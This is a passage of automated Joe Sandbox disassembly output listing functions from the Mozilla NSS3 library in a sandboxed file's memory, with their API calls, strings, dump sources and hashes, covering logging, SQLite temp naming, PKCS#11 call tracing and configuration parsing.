Part of subcall function 6C641240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C64116C,NSPR_LOG_MODULES), ref: 6C641291
Part of subcall function 6C641240: PR_Unlock.NSS3(?,?,?,?,6C64116C,NSPR_LOG_MODULES), ref: 6C6412A0

fopen.API-MS-WIN-CRT-STDIO-L1-1-0(00000000,6C79DEB5,?,6C6A444C,00000000,00000000,00000000,?,6C667F7C,6C6680DD), ref: 6C68CB9D
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001,?,6C6A444C,00000000,00000000,00000000,?,6C667F7C,6C6680DD), ref: 6C68CBAE
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,6C6A444C,00000000,00000000,00000000), ref: 6C68CBE6
PR_IntervalToMicroseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,6C6A444C,00000000,00000000,00000000), ref: 6C68CC37
PR_IntervalToMilliseconds.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C6A444C,00000000,00000000), ref: 6C68CCA4
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000), ref: 6C68CD84
fputc.API-MS-WIN-CRT-STDIO-L1-1-0(0000000A,00000000,?,?,?,?,?,?,?,?,?,?,?,?,6C6A444C,00000000), ref: 6C68CDA6
PR_IntervalToMilliseconds.NSS3(LDjl,?,?,?,?,?,?,?,?,?,?,?,?,?,?,6C6A444C), ref: 6C68CE02
fflush.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C68CE59
__acrt_iob_func.API-MS-WIN-CRT-STDIO-L1-1-0(00000001), ref: 6C68CE64
fclose.API-MS-WIN-CRT-STDIO-L1-1-0(00000000), ref: 6C68CE72

Strings

Avg., xrefs: 6C68CBBE
NSS_OUTPUT_FILE, xrefs: 6C68CB86
% Time, xrefs: 6C68CBB9
Function, xrefs: 6C68CBCD
# Calls, xrefs: 6C68CBC8
Totals, xrefs: 6C68CE2E
Maximum number of concurrent open sessions: %d, xrefs: 6C68CE4A
%-25s %10s %12s %12s %10s, xrefs: 6C68CBD2
%25s %10d %10d%2s, xrefs: 6C68CE33
%-25s %10d %10d%2s , xrefs: 6C68CCD3
LDjl, xrefs: 6C68CDAE, 6C68CE01, 6C68CE1D

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Intervalfputc$Milliseconds__acrt_iob_func$CriticalEnterMicrosecondsSectionSecureUnlockValuefclosefflushfopengetenv
String ID: Maximum number of concurrent open sessions: %d$# Calls$% Time$%-25s %10d %10d%2s $%-25s %10s %12s %12s %10s$%25s %10d %10d%2s$Avg.$Function$LDjl$NSS_OUTPUT_FILE$Totals
API String ID: 2795105899-1271607710
Opcode ID: 7292c4ff5c5491343fc083679f65db1ae3804f3df2adcbf5e6da6ec7a77f74ee
Instruction ID: 1a840506672250870670babb6b3fae99b1dd1c2de70cfa948d52f49b709014e9
Opcode Fuzzy Hash: 7292c4ff5c5491343fc083679f65db1ae3804f3df2adcbf5e6da6ec7a77f74ee
Instruction Fuzzy Hash: 07719B72E062007BC701BA7D5E0AA6EBA74AF97348F148736E90776F01E721494586BE

Function 6C726E50 Relevance: 44.0, APIs: 19, Strings: 6, Instructions: 213stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C5DCA30: EnterCriticalSection.KERNEL32(?,?,?,6C63F9C9,?,6C63F4DA,6C63F9C9,?,?,6C60369A), ref: 6C5DCA7A
Part of subcall function 6C5DCA30: LeaveCriticalSection.KERNEL32(?), ref: 6C5DCB26

memset.VCRUNTIME140(00000000,00000000,?,?,6C5EBE66), ref: 6C726E81
strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,6C5EBE66), ref: 6C726E98
sqlite3_snprintf.NSS3(?,00000000,6C78AAF9,?,?,?,?,?,?,6C5EBE66), ref: 6C726EC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,6C5EBE66), ref: 6C726ED2
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,6C5EBE66), ref: 6C726EF8
sqlite3_snprintf.NSS3(?,00000019,mz_etilqs_,?,?,?,?,?,?,?,6C5EBE66), ref: 6C726F1F
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,6C5EBE66), ref: 6C726F28
sqlite3_randomness.NSS3(0000000F,00000000,?,?,?,?,?,?,?,?,?,?,?,6C5EBE66), ref: 6C726F3D
memset.VCRUNTIME140(?,00000000,?,?,?,?,?,6C5EBE66), ref: 6C726FA6
sqlite3_snprintf.NSS3(?,00000000,6C78AAF9,00000000,?,?,?,?,?,?,?,6C5EBE66), ref: 6C726FDB
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,?,6C5EBE66), ref: 6C726FE4
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,6C5EBE66), ref: 6C726FEF
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C5EBE66), ref: 6C727014
sqlite3_free.NSS3(00000000,?,?,?,?,6C5EBE66), ref: 6C72701D
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,6C5EBE66), ref: 6C727030
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,6C5EBE66), ref: 6C72705B
sqlite3_free.NSS3(00000000,?,?,?,?,?,6C5EBE66), ref: 6C727079
sqlite3_free.NSS3(?,?,?,?,?,?,?,?,6C5EBE66), ref: 6C727097
sqlite3_free.NSS3(00000000,?,?,?,?,?,?,?,?,6C5EBE66), ref: 6C7270A0

Strings

winGetTempname4, xrefs: 6C727046
Pvl, xrefs: 6C7270A8
winGetTempname1, xrefs: 6C72708F
winGetTempname2, xrefs: 6C7270C4
mz_etilqs_, xrefs: 6C726F18
winGetTempname5, xrefs: 6C727071

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: sqlite3_free$strlen$sqlite3_snprintf$CriticalSectionmemset$EnterLeavesqlite3_randomness
String ID: Pvl$mz_etilqs_$winGetTempname1$winGetTempname2$winGetTempname4$winGetTempname5
API String ID: 593473924-3073947195
Opcode ID: cb9095f18a8b0bbc33208a1004397a298c37fa31d3e2019c7dfe92a7de7ffae1
Instruction ID: c094cd2936e94a87813ad0b07a9e933d8a1ba31693fc8c422700a140831e03f1
Opcode Fuzzy Hash: cb9095f18a8b0bbc33208a1004397a298c37fa31d3e2019c7dfe92a7de7ffae1
Instruction Fuzzy Hash: 69518E71E042115BE7149634AE59FBB362A9FC2318F144538E9059BFC1FF29AA0E82D7

Function 6C688E50 Relevance: 42.2, APIs: 14, Strings: 10, Instructions: 169COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_WrapKey), ref: 6C688E76
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C688EA4
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C688EB3

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C688EC9
PR_LogPrint.NSS3( pMechanism = 0x%p,?), ref: 6C688EE5
PL_strncpyz.NSS3(?, hWrappingKey = 0x%x,00000050), ref: 6C688F17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C688F29
PR_LogPrint.NSS3(?,00000000), ref: 6C688F3F
PL_strncpyz.NSS3(?, hKey = 0x%x,00000050), ref: 6C688F71
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C688F80
PR_LogPrint.NSS3(?,00000000), ref: 6C688F96
PR_LogPrint.NSS3( pWrappedKey = 0x%p,?), ref: 6C688FB2
PR_LogPrint.NSS3( pulWrappedKeyLen = 0x%p,?), ref: 6C688FCD
PR_LogPrint.NSS3( *pulWrappedKeyLen = 0x%x,?), ref: 6C689047

Strings

(CK_INVALID_HANDLE), xrefs: 6C688EAC, 6C688F1F, 6C688F79
*pulWrappedKeyLen = 0x%x, xrefs: 6C689042
pMechanism = 0x%p, xrefs: 6C688EE0
pWrappedKey = 0x%p, xrefs: 6C688FAD
C_WrapKey, xrefs: 6C688E71
hWrappingKey = 0x%x, xrefs: 6C688F01, 6C688F11
hKey = 0x%x, xrefs: 6C688F5B, 6C688F6B
hSession = 0x%x, xrefs: 6C688E8E, 6C688E9E
nvl, xrefs: 6C688FEC, 6C689023
pulWrappedKeyLen = 0x%p, xrefs: 6C688FC8

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *pulWrappedKeyLen = 0x%x$ hKey = 0x%x$ hSession = 0x%x$ hWrappingKey = 0x%x$ pMechanism = 0x%p$ pWrappedKey = 0x%p$ pulWrappedKeyLen = 0x%p$ (CK_INVALID_HANDLE)$C_WrapKey$nvl
API String ID: 1003633598-2875670105
Opcode ID: 80f55a6c1805cfe34f5b07e2ba1b35a2ba1ab0e68a08df7087f453c5857e3d73
Instruction ID: c05e45639354678bcf95fd6f34a7c161239e47ce9165580414ea61dd78f9234c
Opcode Fuzzy Hash: 80f55a6c1805cfe34f5b07e2ba1b35a2ba1ab0e68a08df7087f453c5857e3d73
Instruction Fuzzy Hash: 1551A531603108ABDB109F55DE4CF9A7B76AB4634CF084035F9096BA62DB309958CBBE

Function 6C6B4FE0 Relevance: 40.4, APIs: 18, Strings: 5, Instructions: 175COMMON

Download Yara Rule

APIs

isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6675C2,00000000,00000000,00000001), ref: 6C6B5009
PL_strncasecmp.NSS3(?,library=,00000008,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6675C2,00000000), ref: 6C6B5049
PL_strncasecmp.NSS3(?,name=,00000005,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6B505D
PL_strncasecmp.NSS3(?,parameters=,0000000B,?,?,?,?,?,?,?,?), ref: 6C6B5071
PL_strncasecmp.NSS3(?,nss=,00000004,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B5089
PL_strncasecmp.NSS3(?,config=,00000007,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B50A1
NSSUTIL_ArgSkipParameter.NSS3(?), ref: 6C6B50B2
free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000,?,6C6675C2), ref: 6C6B50CB
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6B50D9
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000), ref: 6C6B50F5
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B5103
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B511D
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B512B
free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B5145
NSSUTIL_ArgFetchValue.NSS3(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C6B5153
free.MOZGLUE(?), ref: 6C6B516D
NSSUTIL_ArgFetchValue.NSS3(?,?), ref: 6C6B517B
isspace.API-MS-WIN-CRT-STRING-L1-1-0(?,?,?,?,?,?,?,?,?,?,?,?,?,?,00000000,00000000), ref: 6C6B5195

Strings

nss=, xrefs: 6C6B5083
config=, xrefs: 6C6B509B
parameters=, xrefs: 6C6B506B
library=, xrefs: 6C6B5043
name=, xrefs: 6C6B5057

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: FetchL_strncasecmpValuefree$isspace$ParameterSkip
String ID: config=$library=$name=$nss=$parameters=
API String ID: 391827415-203331871
Opcode ID: d182cf338c2f259ee0e053820ff7815b2bb40630cabf2d485297a59e27ff4416
Instruction ID: c088cfdb71abb43f6902931d337e96fa8c2bb2ee761274e8767b72fed6dc0859
Opcode Fuzzy Hash: d182cf338c2f259ee0e053820ff7815b2bb40630cabf2d485297a59e27ff4416
Instruction Fuzzy Hash: 5551A5B1A011056BEB00DE64DD45AEE37A8AF16248F140030FC19F7741EB35EA26C7BA

Function 6C6B4C10 Relevance: 40.4, APIs: 13, Strings: 10, Instructions: 146stringmemoryCOMMON

Download Yara Rule

APIs

PR_smprintf.NSS3(%s,%s,00000000,?,0000002F,?,?,?,00000000,00000000,?,6C6A4F51,00000000), ref: 6C6B4C50
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6A4F51,00000000), ref: 6C6B4C5B
PR_smprintf.NSS3(6C78AAF9,?,0000002F,?,?,?,00000000,00000000,?,6C6A4F51,00000000), ref: 6C6B4C76
PORT_ZAlloc_Util.NSS3(0000001A,0000002F,?,?,?,00000000,00000000,?,6C6A4F51,00000000), ref: 6C6B4CAE
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B4CC9
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B4CF4
strlen.API-MS-WIN-CRT-STRING-L1-1-0(00000000), ref: 6C6B4D0B
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6A4F51,00000000), ref: 6C6B4D5E
free.MOZGLUE(00000000,?,?,?,0000002F,?,?,?,00000000,00000000,?,6C6A4F51,00000000), ref: 6C6B4D68
PR_smprintf.NSS3(0x%08lx=[%s %s],0000002F,?,00000000), ref: 6C6B4D85
PR_smprintf.NSS3(0x%08lx=[%s askpw=%s timeout=%d %s],0000002F,?,?,?,00000000), ref: 6C6B4DA2
free.MOZGLUE(?), ref: 6C6B4DB9
free.MOZGLUE(00000000), ref: 6C6B4DCF

Strings

rootFlags, xrefs: 6C6B4D47
0x%08lx=[%s %s], xrefs: 6C6B4D80
every, xrefs: 6C6B4CA1
%s,%s, xrefs: 6C6B4C4B
0x%08lx=[%s askpw=%s timeout=%d %s], xrefs: 6C6B4D9D
slotFlags, xrefs: 6C6B4D34
ootT, xrefs: 6C6B4D1A
timeout, xrefs: 6C6B4C91
any, xrefs: 6C6B4C96
rust, xrefs: 6C6B4D22

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: free$R_smprintf$strlen$Alloc_Util
String ID: %s,%s$0x%08lx=[%s %s]$0x%08lx=[%s askpw=%s timeout=%d %s]$any$every$ootT$rootFlags$rust$slotFlags$timeout
API String ID: 3756394533-2552752316
Opcode ID: a7840368bc2e853b698ee9a1c64bd70f70e3d3bb33f12e178615af1b8f1463fc
Instruction ID: cc24fd8302f3a4a17570e65b1fd10fcec1edd80f96c817ce2fbd3c31eac68d10
Opcode Fuzzy Hash: a7840368bc2e853b698ee9a1c64bd70f70e3d3bb33f12e178615af1b8f1463fc
Instruction Fuzzy Hash: B5418DB29011416BDB115F689C446BE3BA5AF82758F144134FC1A2BB01E771E934C7EB

Function 6C684950 Relevance: 38.7, APIs: 13, Strings: 9, Instructions: 170COMMON

Download Yara Rule

APIs

PR_LogPrint.NSS3(C_CopyObject), ref: 6C684976
PL_strncpyz.NSS3(?, hSession = 0x%x,00000050), ref: 6C6849A7
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C6849B6

Part of subcall function 6C76D930: PL_strncpyz.NSS3(?,?,?), ref: 6C76D963

PR_LogPrint.NSS3(?,00000000), ref: 6C6849CC
PL_strncpyz.NSS3(?, hObject = 0x%x,00000050), ref: 6C6849FA
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C684A09
PR_LogPrint.NSS3(?,00000000), ref: 6C684A1F
PR_LogPrint.NSS3( pTemplate = 0x%p,?), ref: 6C684A40
PR_LogPrint.NSS3( ulCount = %d,?), ref: 6C684A5C
PR_LogPrint.NSS3( phNewObject = 0x%p,?), ref: 6C684A7C
PL_strncpyz.NSS3(?, *phNewObject = 0x%x,00000050), ref: 6C684B17
PL_strcatn.NSS3(?,00000050, (CK_INVALID_HANDLE)), ref: 6C684B26
PR_LogPrint.NSS3(?,00000000), ref: 6C684B3C

Strings

phNewObject = 0x%p, xrefs: 6C684A77
(CK_INVALID_HANDLE), xrefs: 6C6849AF, 6C684A02, 6C684B1F
*phNewObject = 0x%x, xrefs: 6C684B01, 6C684B11
ulCount = %d, xrefs: 6C684A57
hSession = 0x%x, xrefs: 6C684991, 6C6849A1
nvl, xrefs: 6C684AA6, 6C684ADC
C_CopyObject, xrefs: 6C684971
hObject = 0x%x, xrefs: 6C6849E4, 6C6849F4
pTemplate = 0x%p, xrefs: 6C684A39

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: Print$L_strncpyz$L_strcatn
String ID: *phNewObject = 0x%x$ hObject = 0x%x$ hSession = 0x%x$ pTemplate = 0x%p$ phNewObject = 0x%p$ ulCount = %d$ (CK_INVALID_HANDLE)$C_CopyObject$nvl
API String ID: 1003633598-615806733
Opcode ID: c98721d61ef6fa0981c6bafda79b61ca0b2622b34790d031970e2b2529536770
Instruction ID: 6a6697d6cb572a70012eaa33e1f15deea04d749a974ed41e89e37b762e6ba6b7
Opcode Fuzzy Hash: c98721d61ef6fa0981c6bafda79b61ca0b2622b34790d031970e2b2529536770
Instruction Fuzzy Hash: CF519271602108ABDB00CF55DE8CFAA7B79AB4634CF054024F9097BA11DB60AD18CBBE

Function 6C696910 Relevance: 38.6, APIs: 15, Strings: 7, Instructions: 131COMMON

Download Yara Rule

APIs

NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C696943

Part of subcall function 6C6B4210: strlen.API-MS-WIN-CRT-STRING-L1-1-0(?,480F8E0B,flags,?,00000000,?,6C695947,flags,printPolicyFeedback,?,?,?,?,?,?,00000000), ref: 6C6B4220
Part of subcall function 6C6B4210: NSSUTIL_ArgGetParamValue.NSS3(?,GYil,?,?,?,?,?,?,00000000,?,00000000,?,6C697703,?,00000000,00000000), ref: 6C6B422D
Part of subcall function 6C6B4210: PL_strncasecmp.NSS3(00000000,?,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C697703), ref: 6C6B424B
Part of subcall function 6C6B4210: free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C697703,?,00000000), ref: 6C6B4272

NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C696957
NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C696972
NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C696983

Part of subcall function 6C6B3EA0: isspace.API-MS-WIN-CRT-STRING-L1-1-0(8914C483,70E85609,6C68C79F,?,6C696247,70E85609,?,?,6C68C79F,6C69781D,?,6C68BD52,00000001,70E85609,D85D8B04,?), ref: 6C6B3EB8

PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6969AA
PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6969BE
PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6969D2
NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6969DF

Part of subcall function 6C6B4020: isspace.API-MS-WIN-CRT-STRING-L1-1-0(FFFFEF69,00000000,?,?,766B4C80,?,6C6B50B7,?), ref: 6C6B4041

free.MOZGLUE(00000000), ref: 6C6969F6
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C696A04
free.MOZGLUE(00000000), ref: 6C696A1B
NSSUTIL_ArgFetchValue.NSS3(-0000000B,?), ref: 6C696A29
free.MOZGLUE(00000000), ref: 6C696A3F
NSSUTIL_ArgFetchValue.NSS3(-0000000A,?), ref: 6C696A4D
NSSUTIL_ArgStrip.NSS3(?), ref: 6C696A5B

Strings

certPrefix=, xrefs: 6C6969B8
nokeydb, xrefs: 6C696968
nocertdb, xrefs: 6C696951
keyPrefix=, xrefs: 6C6969CC
flags, xrefs: 6C696937, 6C696942, 6C696956, 6C69696D
configdir=, xrefs: 6C6969A4
readOnly, xrefs: 6C69693D

Memory Dump Source

Source File: 00000000.00000002.2012379060.000000006C5D1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 6C5D0000, based on PE: true

Associated: 00000000.00000002.2012341709.000000006C5D0000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012599791.000000006C76F000.00000002.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012704630.000000006C7AE000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012746269.000000006C7AF000.00000008.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012794701.000000006C7B0000.00000004.00000001.01000000.0000000A.sdmpDownload File
Associated: 00000000.00000002.2012836716.000000006C7B5000.00000002.00000001.01000000.0000000A.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6c5d0000_file.jbxd

Similarity

API ID: L_strncasecmpValuefree$FetchFlag$Stripisspace$ParamParameterSkipstrlen
String ID: certPrefix=$configdir=$flags$keyPrefix=$nocertdb$nokeydb$readOnly
API String ID: 2065226673-2785624044
Opcode ID: df91bfdc476f6ce2babaff6bdd31efedf14ea7b045a43c542e6176fcb3cbd70a
Instruction ID: 6470fae754ad162d2389b540fd1a8afe3ea731ca06f4738e58ae7567710f638b
Opcode Fuzzy Hash: df91bfdc476f6ce2babaff6bdd31efedf14ea7b045a43c542e6176fcb3cbd70a
Instruction Fuzzy Hash: A041A0B1E403066BE740DB74AD81BAF77ACAF15248F180431E905E6B02F735DA1887AA

Function 6C696CD0 Relevance: 37.0, APIs: 20, Strings: 1, Instructions: 298stringCOMMON

Download Yara Rule

APIs

Part of subcall function 6C696910: NSSUTIL_ArgHasFlag.NSS3(flags,readOnly,00000000), ref: 6C696943
Part of subcall function 6C696910: NSSUTIL_ArgHasFlag.NSS3(flags,nocertdb,00000000), ref: 6C696957
Part of subcall function 6C696910: NSSUTIL_ArgHasFlag.NSS3(flags,nokeydb,00000000), ref: 6C696972
Part of subcall function 6C696910: NSSUTIL_ArgStrip.NSS3(00000000), ref: 6C696983
Part of subcall function 6C696910: PL_strncasecmp.NSS3(00000000,configdir=,0000000A), ref: 6C6969AA
Part of subcall function 6C696910: PL_strncasecmp.NSS3(00000000,certPrefix=,0000000B), ref: 6C6969BE
Part of subcall function 6C696910: PL_strncasecmp.NSS3(00000000,keyPrefix=,0000000A), ref: 6C6969D2
Part of subcall function 6C696910: NSSUTIL_ArgSkipParameter.NSS3(00000000), ref: 6C6969DF
Part of subcall function 6C696910: NSSUTIL_ArgStrip.NSS3(?), ref: 6C696A5B

strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C696D8C
free.MOZGLUE(00000000), ref: 6C696DC5
free.MOZGLUE(?), ref: 6C696DD6
free.MOZGLUE(?), ref: 6C696DE7
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,00000000), ref: 6C696E1F
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C696E4B
strcmp.API-MS-WIN-CRT-STRING-L1-1-0(?,?), ref: 6C696E72
free.MOZGLUE(?), ref: 6C696EA7
free.MOZGLUE(?), ref: 6C696EC4
free.MOZGLUE(?), ref: 6C696ED5
free.MOZGLUE(00000000), ref: 6C696EE3
free.MOZGLUE(?), ref: 6C696EF4
free.MOZGLUE(?), ref: 6C696F08
free.MOZGLUE(00000000), ref: 6C696F35
free.MOZGLUE(?), ref: 6C696F44
free.MOZGLUE(?), ref: 6C696F5B
free.MOZGLUE(00000000), ref: 6C696F65

Part of subcall function 6C696C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C69781D,00000000,6C68BE2C,?,6C696B1D,?,?,?,?,00000000,00000000,6C69781D), ref: 6C696C40
Part of subcall function 6C696C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C69781D,?,6C68BE2C,?), ref: 6C696C58
Part of subcall function 6C696C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C69781D), ref: 6C696C6F
Part of subcall function 6C696C30: strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C696C84
Part of subcall function 6C696C30: PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C696C96
Part of subcall function 6C696C30: strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C696CAA

